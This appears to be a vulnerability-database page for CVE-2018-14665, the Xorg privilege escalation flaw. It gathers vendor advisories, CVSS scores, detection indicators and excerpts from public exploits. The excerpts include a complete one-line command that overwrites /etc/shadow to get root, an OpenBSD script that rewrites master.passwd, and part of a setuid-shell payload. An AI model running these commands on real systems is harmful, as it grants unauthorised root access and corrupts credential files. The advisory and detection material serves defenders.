CVE-2018-14665
published 2018-10-25CVE-2018-14665: A flaw was found in xorg-x11-server before 1.20.3. An incorrect permission check for -modulepath and -logfile options when starting Xorg. X server allows…
PriorityP184medium6.6CVSS 3.0
AVPACLPRLUINSUCHIHAH
ITWEXPLOITVulnCheck KEVRansomware
Exploited in the wild
EPSS
27.04%
97.8th percentile
A flaw was found in xorg-x11-server before 1.20.3. An incorrect permission check for -modulepath and -logfile options when starting Xorg. X server allows unprivileged users with the ability to log in to the system via physical console to escalate their privileges and run arbitrary code under root privileges.
Affected
16 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| canonical | ubuntu_linux | — | — |
| canonical | ubuntu_linux | — | — |
| canonical | ubuntu_linux | — | — |
| debian | debian_linux | — | — |
| debian | xorg-server | < xorg-server 2:1.20.3-1 (bookworm) | xorg-server 2:1.20.3-1 (bookworm) |
| redhat | enterprise_linux_desktop | — | — |
| redhat | enterprise_linux_server | — | — |
| redhat | enterprise_linux_server_aus | — | — |
| redhat | enterprise_linux_server_eus | — | — |
| redhat | enterprise_linux_server_tus | — | — |
| redhat | enterprise_linux_workstation | — | — |
| x.org | x_server | < 1.20.3 | 1.20.3 |
| x.org | xorg-server | >= 0 < 2:1.20.3-1 | 2:1.20.3-1 |
| x.org | xorg-server | >= 0 < 2:1.20.3-1 | 2:1.20.3-1 |
| x.org | xorg-server | >= 0 < 2:1.20.3-1 | 2:1.20.3-1 |
| x.org | xorg-server | >= 0 < 2:1.20.3-1 | 2:1.20.3-1 |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect Xorg launched with -modulepath pointing to /tmp or other world-writable directories, which is the core exploitation technique for this CVE. ↗
- →Detect Xorg launched with -logfile pointing to sensitive system files such as /etc/passwd or paths using directory traversal (e.g., ../etc/passwd), indicating exploitation of the -logfile overwrite vector. ↗
- →Monitor for creation of /tmp/libglx.so, /tmp/pwned.c, /tmp/wow.ksh, /tmp/wowee.ksh, or /tmp/passwd.backup as post-exploitation artifacts associated with known PoC and Metasploit exploit scripts. ↗
- →Alert on gcc being invoked to compile a shared library in /tmp (e.g., gcc -fPIC -shared -nostartfiles), followed by Xorg execution — this matches the -modulepath exploit chain. ↗
- →Detect Xorg processes spawned by non-root, non-display-manager users (i.e., unprivileged shell sessions), especially when the binary has SUID bit set, on versions 1.19.0 through 1.20.2. ↗
- →On AIX targets, watch for the creation and execution of /tmp/wow.ksh using ksh93, followed by /etc/passwd modification — the AIX exploit variant uses -config and -logfile to overwrite /etc/passwd. ↗
- →Detect cron-based payload execution following Xorg launch; the Metasploit module for Linux/OpenBSD/CentOS/RHEL uses cron to execute the payload as root. ↗
- ·Exploitation requires Xorg to be installed with the SUID bit set. Systems where the SUID bit has been removed (chmod 755) are not exploitable via this CVE. ↗
- ·On CentOS and RHEL, the default PAM configuration requires console authentication to start the Xorg server, preventing exploitation over SSH sessions. ↗
- ·The AIX exploit variant replaces the -fp parameter (used in the OpenBSD exploit) with -config combined with ANSI-C quoting via ksh93 to inject newlines into /etc/passwd; ksh93 must be present. ↗
- ·Successful exploitation via the Metasploit AIX module results in /etc/passwd being overwritten; all currently logged-in users must be included in the overwritten file or AIX will throw errors. ↗
- ·The vulnerability only affects xorg-x11-server versions 1.19.0 through 1.20.2; version 1.20.3 and later are patched. ↗
CVSS provenance
nvdv3.06.6MEDIUMCVSS:3.0/AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.2HIGHAV:L/AC:L/Au:N/C:C/I:C/A:C
osv6.6MEDIUM
vulncheck6.6MEDIUM
vendor_debian6.6MEDIUM
vendor_redhat6.6MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Ubuntu
X.Org X server vulnerability
vendor_ubuntu·2018-10-26
CVE-2018-14665 X.Org X server vulnerability
Title: X.Org X server vulnerability
Summary: X.Org X server could be made to overwrite files as the administrator.
Narendra Shinde discovered that the X.Org X server incorrectly handled
certain command line parameters when running as root with the legacy
wrapper. When certain graphics drivers are being used, a local attacker
could possibly use this issue to overwrite arbitrary files and escalate
privileges.
Instructions: After a standard system update you need to reboot your computer to make
all the necessary changes.
Red Hat
xorg-x11-server: Incorrect permission check in Xorg X server allows for privilege escalation
vendor_redhat·2018-10-25·CVSS 6.6
CVE-2018-14665 [MEDIUM] CWE-271 xorg-x11-server: Incorrect permission check in Xorg X server allows for privilege escalation
xorg-x11-server: Incorrect permission check in Xorg X server allows for privilege escalation
A flaw was found in xorg-x11-server before 1.20.3. An incorrect permission check for -modulepath and -logfile options when starting Xorg. X server allows unprivileged users with the ability to log in to the system via physical console to escalate their privileges and run arbitrary code under root privileges.
An incorrect permission check for -modulepath and -logfile options when starting Xorg X server allows unprivileged users with the ability to log in to the system via physical console to escalate their privileges and run arbitrary code under root privileges.
Statement: This issue did not affect the versions of xorg-x11-server as shipped with Red Hat Enterprise Linux 5 and 6, as well as Red Ha
Debian
CVE-2018-14665: xorg-server - A flaw was found in xorg-x11-server before 1.20.3. An incorrect permission check...
vendor_debian·2018·CVSS 6.6
CVE-2018-14665 [MEDIUM] CVE-2018-14665: xorg-server - A flaw was found in xorg-x11-server before 1.20.3. An incorrect permission check...
A flaw was found in xorg-x11-server before 1.20.3. An incorrect permission check for -modulepath and -logfile options when starting Xorg. X server allows unprivileged users with the ability to log in to the system via physical console to escalate their privileges and run arbitrary code under root privileges.
Scope: local
bookworm: resolved (fixed in 2:1.20.3-1)
bullseye: resolved (fixed in 2:1.20.3-1)
forky: resolved (fixed in 2:1.20.3-1)
sid: resolved (fixed in 2:1.20.3-1)
trixie: resolved (fixed in 2:1.20.3-1)
GHSA
GHSA-c34f-6cmx-fcvv: A flaw was found in xorg-x11-server before 1
ghsa_unreviewed·2022-05-13
CVE-2018-14665 [HIGH] CWE-863 GHSA-c34f-6cmx-fcvv: A flaw was found in xorg-x11-server before 1
A flaw was found in xorg-x11-server before 1.20.3. An incorrect permission check for -modulepath and -logfile options when starting Xorg. X server allows unprivileged users with the ability to log in to the system via physical console to escalate their privileges and run arbitrary code under root privileges.
OSV
CVE-2018-14665: A flaw was found in xorg-x11-server before 1
osv·2018-10-25·CVSS 6.6
CVE-2018-14665 [MEDIUM] CVE-2018-14665: A flaw was found in xorg-x11-server before 1
A flaw was found in xorg-x11-server before 1.20.3. An incorrect permission check for -modulepath and -logfile options when starting Xorg. X server allows unprivileged users with the ability to log in to the system via physical console to escalate their privileges and run arbitrary code under root privileges.
VulnCheck
x.org x_server Incorrect Authorization
vulncheck·2018·CVSS 6.6
CVE-2018-14665 [MEDIUM] x.org x_server Incorrect Authorization
x.org x_server Incorrect Authorization
A flaw was found in xorg-x11-server before 1.20.3. An incorrect permission check for -modulepath and -logfile options when starting Xorg. X server allows unprivileged users with the ability to log in to the system via physical console to escalate their privileges and run arbitrary code under root privileges.
Affected: x.org x_server
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Known Ransomware Campaign Use: Known
Exploitation References: https://know.netenrich.com/blog/ragnar-locker-petya-and-ryuk-know-your-ransomware/
Exploit PoC: https://vulncheck.com/xdb/aab96d127c7b; https://vulncheck.com/xdb/b8a62e91d313
No detection rules found.
Exploit-DB
Xorg X11 Server - Local Privilege Escalation (Metasploit)
exploitdb·2019-11-20
CVE-2018-14665 Xorg X11 Server - Local Privilege Escalation (Metasploit)
Xorg X11 Server - Local Privilege Escalation (Metasploit)
---
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule 'Xorg X11 Server Local Privilege Escalation',
'Description' => %q(
WARNING: Successful execution of this module results in /etc/passwd being overwritten.
This module is a port of the OpenBSD X11 Xorg exploit to run on AIX.
A permission check flaw exists for -modulepath and -logfile options when
starting Xorg. This allows unprivileged users that can start the server
the ability to elevate privileges and run arbitrary code under root
privileges.
This module has been tested with AIX 7.1 and 7.2, and should also work with 6.1.
Due to permission restrictions of the cron
Exploit-DB
xorg-x11-server < 1.20.3 (Solaris 11) - 'inittab Local Privilege Escalation
exploitdb·2019-01-14·CVSS 6.6
CVE-2018-14665 [MEDIUM] xorg-x11-server < 1.20.3 (Solaris 11) - 'inittab Local Privilege Escalation
xorg-x11-server
#
# A flaw was found in xorg-x11-server before 1.20.3. An incorrect permission
# check for -modulepath and -logfile options when starting Xorg. X server
# allows unprivileged users with the ability to log in to the system via
# physical console to escalate their privileges and run arbitrary code under
# root privileges (CVE-2018-14665).
#
# "In video games, this is what they call respawning" -- Nick Sax
#
# This exploit targets /etc/inittab in order to escalate privileges to root
# on Solaris 11 (no need to be connected to a physical console). Messing with
# inittab is considerably dangerous and you may trash your system, however the
# other potential vectors (cron, passwd, sudo, ld.config, etc.) either don't
# work or are even worse. Still, DON'T RUN UNLESS YOU KNOW WHAT Y
Exploit-DB
Xorg X11 Server (AIX) - Local Privilege Escalation
exploitdb·2018-12-04·CVSS 6.6
CVE-2018-14665 [MEDIUM] Xorg X11 Server (AIX) - Local Privilege Escalation
Xorg X11 Server (AIX) - Local Privilege Escalation
---
# Exploit Title: AIX Xorg X11 Server - Local Privilege Escalation
# Date: 29/11/2018
# Exploit Author: @0xdono
# Original Discovery and Exploit: Narendra Shinde
# Vendor Homepage: https://www.x.org/
# Platform: AIX
# Version: X Window System Version 7.1.1
# Fileset: X11.base.rte );
close($passwd_fh);
# Retrieve currently logged in users
print "[-] Retrieving currently logged in users \n";
@users = `who | cut -d' ' -f1 | sort | uniq`;
chomp(@users);
# For all logged in users, add their current passwd entry to string
# that will be used to overwrite passwd
$users_logged_in_passwd = '';
foreach my $user (@users)
{
$user .= ":";
foreach my $line (@passwd_array)
{
if (index($line, $user) == 0) {
$users_logged_in_passwd = $users_logged_i
Exploit-DB
xorg-x11-server < 1.20.3 - 'modulepath' Local Privilege Escalation
exploitdb·2018-11-30·CVSS 7.2
CVE-2018-14665 [HIGH] xorg-x11-server < 1.20.3 - 'modulepath' Local Privilege Escalation
xorg-x11-server
#
# A flaw was found in xorg-x11-server before 1.20.3. An incorrect permission
# check for -modulepath and -logfile options when starting Xorg. X server
# allows unprivileged users with the ability to log in to the system via
# physical console to escalate their privileges and run arbitrary code under
# root privileges (CVE-2018-14665).
#
# This exploit variant triggers the bug in the -modulepath command line switch
# to load a malicious X11 module in order to escalate privileges to root on
# vulnerable systems. This technique is less invasive than exploiting the
# -logfile switch, however the gcc compiler must be present in order for it to
# work out of the box. Alternatively, you must use a pre-compiled malicious .so
# compatible with the target system and modify the expl
Exploit-DB
Xorg X11 Server - SUID privilege escalation (Metasploit)
exploitdb·2018-11-26
CVE-2018-14665 Xorg X11 Server - SUID privilege escalation (Metasploit)
Xorg X11 Server - SUID privilege escalation (Metasploit)
---
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule 'Xorg X11 Server SUID privilege escalation',
'Description' => %q{
This module attempts to gain root privileges with SUID Xorg X11 server
versions 1.19.0 MSF_LICENSE,
'Author' =>
[
'Narendra Shinde', # Discovery and exploit
'Raptor - 0xdea', # Modified exploit for cron
'Aaron Ringo', # Metasploit module
'Brendan Coles ' # Metasploit module
],
'DisclosureDate' => 'Oct 25 2018',
'References' =>
[
[ 'CVE', '2018-14665' ],
[ 'BID', '105741' ],
[ 'EDB', '45697' ],
[ 'EDB', '45742' ],
[ 'EDB', '45832' ],
[ 'URL', 'https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-s
Exploit-DB
xorg-x11-server < 1.20.1 - Local Privilege Escalation
exploitdb·2018-11-13·CVSS 6.6
CVE-2018-14665 [MEDIUM] xorg-x11-server < 1.20.1 - Local Privilege Escalation
xorg-x11-server bolo console opened
# [*] Building root shell wait 2 minutes
# [*] crontab overwritten
#
# ... cut Xorg output ...
#
# [*] Xorg killed
# (II) Server terminated successfully (0). Closing log file.
# [*] Don't forget to cleanup /etc/crontab and /tmp dir
# sh-4.2# id && whoami
# uid=0(root) gid=0(root) gruppi=0(root),1001(bolo)
# root
# sh-4.2#
#!/usr/bin/python
import os
import getpass
import subprocess
userList = []
path="/var/run/console/"
def getWhoami():
return getpass.getuser()
def getConsole(path):
p = subprocess.Popen(["ls", path], stdout=subprocess.PIPE)
(console, err) = p.communicate()
consoleList = str.splitlines(console)
return consoleList
def payload():
f = open("/tmp/payload", "w")
payload = ("cp /bin/sh /usr/local/bin/shell\n"
"echo \"#include \" > /tmp/sh
Exploit-DB
xorg-x11-server 1.20.3 - Privilege Escalation
exploitdb·2018-10-30·CVSS 6.6
CVE-2018-14665 [MEDIUM] xorg-x11-server 1.20.3 - Privilege Escalation
xorg-x11-server 1.20.3 - Privilege Escalation
---
# Exploit Title: xorg-x11-server 1.20.3 - Privilege Escalation
# Date: 2018-10-27
# Exploit Author: Marco Ivaldi
# Vendor Homepage: https://www.x.org/
# Version: xorg-x11-server 1.19.0 - 1.20.2
# Tested on: OpenBSD 6.3 and 6.4
# CVE : CVE-2018-14665
# raptor_xorgasm
#!/bin/sh
#
# raptor_xorgasm - xorg-x11-server LPE via OpenBSD's cron
# Copyright (c) 2018 Marco Ivaldi
#
# A flaw was found in xorg-x11-server before 1.20.3. An incorrect permission
# check for -modulepath and -logfile options when starting Xorg. X server
# allows unprivileged users with the ability to log in to the system via
# physical console to escalate their privileges and run arbitrary code under
# root privileges (CVE-2018-14665).
#
# This exploit targets OpenBSD's
Exploit-DB
xorg-x11-server < 1.20.3 - Local Privilege Escalation
exploitdb·2018-10-25·CVSS 6.6
CVE-2018-14665 [MEDIUM] xorg-x11-server < 1.20.3 - Local Privilege Escalation
xorg-x11-server < 1.20.3 - Local Privilege Escalation
---
#CVE-2018-14665 - a LPE exploit via http://X.org fits in a tweet
cd /etc; Xorg -fp "root::16431:0:99999:7:::" -logfile shadow :1;su
Overwrite shadow (or any) file on most Linux, get root privileges. *BSD and any other Xorg desktop also affected.
#!/bin/sh
# local privilege escalation in X11 currently
# unpatched in OpenBSD 6.4 stable - exploit
# uses cve-2018-14665 to overwrite files as root.
# Impacts Xorg 1.19.0 - 1.20.2 which ships setuid
# and vulnerable in default OpenBSD.
#
# - https://hacker.house
echo [+] OpenBSD 6.4-stable local root exploit
cd /etc
Xorg -fp 'root:$2b$08$As7rA9IO2lsfSyb7OkESWueQFzgbDfCXw0JXjjYszKa8Aklt5RTSG:0:0:daemon:0:0:Charlie &:/root:/bin/ksh' -logfile master.passwd :1 &
sleep 5
pkill Xorg
echo [-
Metasploit
Xorg X11 Server SUID logfile Privilege Escalation
metasploit
Xorg X11 Server SUID logfile Privilege Escalation
Xorg X11 Server SUID logfile Privilege Escalation
This module attempts to gain root privileges with SUID Xorg X11 server versions 1.19.0 < 1.20.3. A permission check flaw exists for -modulepath and -logfile options when starting Xorg. This allows unprivileged users that can start the server the ability to elevate privileges and run arbitrary code under root privileges. This module has been tested with OpenBSD 6.3, 6.4, CentOS 7.4.1708, and CentOS 7.5.1804, and RHEL 7.5. The default PAM configuration for CentOS and RHEL systems requires console auth for the user's session to start the Xorg server. Cron launches the payload, so if SELinux is enforcing, exploitation may still be possible, but the module will bail. Xorg must have SUID permissions and may not start if already running. On explo
Metasploit
Xorg X11 Server SUID modulepath Privilege Escalation
metasploit
Xorg X11 Server SUID modulepath Privilege Escalation
Xorg X11 Server SUID modulepath Privilege Escalation
This module attempts to gain root privileges with SUID Xorg X11 server versions 1.19.0 < 1.20.3. A permission check flaw exists for -modulepath and -logfile options when starting Xorg. This allows unprivileged users that can start the server the ability to elevate privileges and run arbitrary code under root privileges. This module has been tested with CentOS 7 (1708). CentOS default install will require console auth for the users session. Xorg must have SUID permissions and may not start if running. On successful exploitation artifacts will be created consistant with starting Xorg.
Metasploit
Xorg X11 Server Local Privilege Escalation
metasploit
Xorg X11 Server Local Privilege Escalation
Xorg X11 Server Local Privilege Escalation
WARNING: Successful execution of this module results in /etc/passwd being overwritten. This module is a port of the OpenBSD X11 Xorg exploit to run on AIX. A permission check flaw exists for -modulepath and -logfile options when starting Xorg. This allows unprivileged users that can start the server the ability to elevate privileges and run arbitrary code under root privileges. This module has been tested with AIX 7.1 and 7.2, and should also work with 6.1. Due to permission restrictions of the crontab in AIX, this module does not use cron, and instead overwrites /etc/passwd in order to create a new user with root privileges. All currently logged in users need to be included when /etc/passwd is overwritten, else AIX will throw 'Cannot get "LOGNAM
Tenable
Tweetable Exploit for X.org Server Local Privilege Escalation (CVE-2018-14665) Released
blogs_tenable·2018-10-26·CVSS 6.6
[MEDIUM] Tweetable Exploit for X.org Server Local Privilege Escalation (CVE-2018-14665) Released
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Tenable
Tweetable Exploit for X.org Server Local Privilege Escalation (CVE-2018-14665) Released
blogs_tenable·2018-10-26·CVSS 6.6
CVE-2018-14665 [MEDIUM] Tweetable Exploit for X.org Server Local Privilege Escalation (CVE-2018-14665) Released
Blog / Cyber Exposure Alerts
Subscribe
# Tweetable Exploit for X.org Server Local Privilege Escalation (CVE-2018-14665) Released
Paul Davis
October 26, 2018
3 Min Read
A researcher has published a local privilege escalation exploit that fits in a single tweet for xorg-x11-server. Vendors are rolling out fixes and mitigation advice.
### Background
On October 25, a tweetable proof-of-concept (PoC) exploit for a newly discovered local privilege escalation (LPE) vulnerability in xorg-x11-server was released.
Not surprisingly, exploitable scripts were quickly available on the web due to the trivial nature of this exploit.
### Impact assessment
This vulnerability allows Linux and Unix hosts running xorg-server in setuid (privileged) mode to have files overwritten via the -logfile and -
Bugzilla
CVE-2018-14665 xorg-x11-server: Incorrect permission check in Xorg X server allows for privilege escalation [fedora-all]
bugzilla·2018-10-25·CVSS 6.6
CVE-2018-14665 [MEDIUM] CVE-2018-14665 xorg-x11-server: Incorrect permission check in Xorg X server allows for privilege escalation [fedora-all]
CVE-2018-14665 xorg-x11-server: Incorrect permission check in Xorg X server allows for privilege escalation [fedora-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of fedora-all.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
NOTE: thi
Bugzilla
xorg-x11-server: Format string vulnerability in os/log.c:LogFilePrep() allows for memory disclosure and crash
bugzilla·2018-10-11·CVSS 6.6
[MEDIUM] xorg-x11-server: Format string vulnerability in os/log.c:LogFilePrep() allows for memory disclosure and crash
xorg-x11-server: Format string vulnerability in os/log.c:LogFilePrep() allows for memory disclosure and crash
The X.org X11 server has a format string vulnerability in the os/log.c:LogFilePrep() function. A local user can exploit this by executing the Xorg binary with crafted arguments to read arbitrary memory and cause a crash.
Discussion:
Acknowledgments:
Name: Narendra Shinde
---
Upstream is currently not fixing this issue in LogFilePrep(), as the file name passed to the function is expected to optionally contain format specifier %s. The following comment-only change was made to explicitly note this expectation:
https://gitlab.freedesktop.org/xorg/xserver/commit/da15c7413916f754708c62c2089265528cd661e2
With the fix for CVE-2018-14665 (bug 1637761) applied, Xorg no longer allows
Bugzilla
CVE-2018-14665 xorg-x11-server: Incorrect permission check in Xorg X server allows for privilege escalation
bugzilla·2018-10-10·CVSS 6.6
CVE-2018-14665 [MEDIUM] CVE-2018-14665 xorg-x11-server: Incorrect permission check in Xorg X server allows for privilege escalation
CVE-2018-14665 xorg-x11-server: Incorrect permission check in Xorg X server allows for privilege escalation
The X.org X11 server has a vulnerability that allows local users to escalate to
full root privileges. The /usr/bin/Xorg setuid binary shipped in the
xorg-x11-server-Xorg package allows for arbitrary file creation with certain
parameters, allowing attackers with low privilege access to overwrite system
files and subsequently execute arbitrary code.
Discussion:
Acknowledgments:
Name: Narendra Shinde
---
This flaw was introduced in the upstream xserver version 1.19.0 via the following commit:
https://gitlab.freedesktop.org/xorg/xserver/commit/032b1d79b7
Prior to that commit, X server command line options -logfile and -modulepath could only be used when X server is started by the
http://packetstormsecurity.com/files/154942/Xorg-X11-Server-SUID-modulepath-Privilege-Escalation.htmlhttp://packetstormsecurity.com/files/155276/Xorg-X11-Server-Local-Privilege-Escalation.htmlhttp://www.securityfocus.com/bid/105741http://www.securitytracker.com/id/1041948https://access.redhat.com/errata/RHSA-2018:3410https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2018-14665https://gitlab.freedesktop.org/xorg/xserver/commit/50c0cf885a6e91c0ea71fb49fa8f1b7c86fe330ehttps://gitlab.freedesktop.org/xorg/xserver/commit/8a59e3b7dbb30532a7c3769c555e00d7c4301170https://lists.x.org/archives/xorg-announce/2018-October/002927.htmlhttps://security.gentoo.org/glsa/201810-09https://usn.ubuntu.com/3802-1/https://www.debian.org/security/2018/dsa-4328https://www.exploit-db.com/exploits/45697/https://www.exploit-db.com/exploits/45742/https://www.exploit-db.com/exploits/45832/https://www.exploit-db.com/exploits/45908/https://www.exploit-db.com/exploits/45922/https://www.exploit-db.com/exploits/45938/https://www.exploit-db.com/exploits/46142/https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.htmlhttp://packetstormsecurity.com/files/154942/Xorg-X11-Server-SUID-modulepath-Privilege-Escalation.htmlhttp://packetstormsecurity.com/files/155276/Xorg-X11-Server-Local-Privilege-Escalation.htmlhttp://www.securityfocus.com/bid/105741http://www.securitytracker.com/id/1041948https://access.redhat.com/errata/RHSA-2018:3410https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2018-14665https://gitlab.freedesktop.org/xorg/xserver/commit/50c0cf885a6e91c0ea71fb49fa8f1b7c86fe330ehttps://gitlab.freedesktop.org/xorg/xserver/commit/8a59e3b7dbb30532a7c3769c555e00d7c4301170https://lists.x.org/archives/xorg-announce/2018-October/002927.htmlhttps://security.gentoo.org/glsa/201810-09https://usn.ubuntu.com/3802-1/https://www.debian.org/security/2018/dsa-4328https://www.exploit-db.com/exploits/45697/https://www.exploit-db.com/exploits/45742/https://www.exploit-db.com/exploits/45832/https://www.exploit-db.com/exploits/45908/https://www.exploit-db.com/exploits/45922/https://www.exploit-db.com/exploits/45938/https://www.exploit-db.com/exploits/46142/https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html
2018-10-25
Published
Exploited in the wild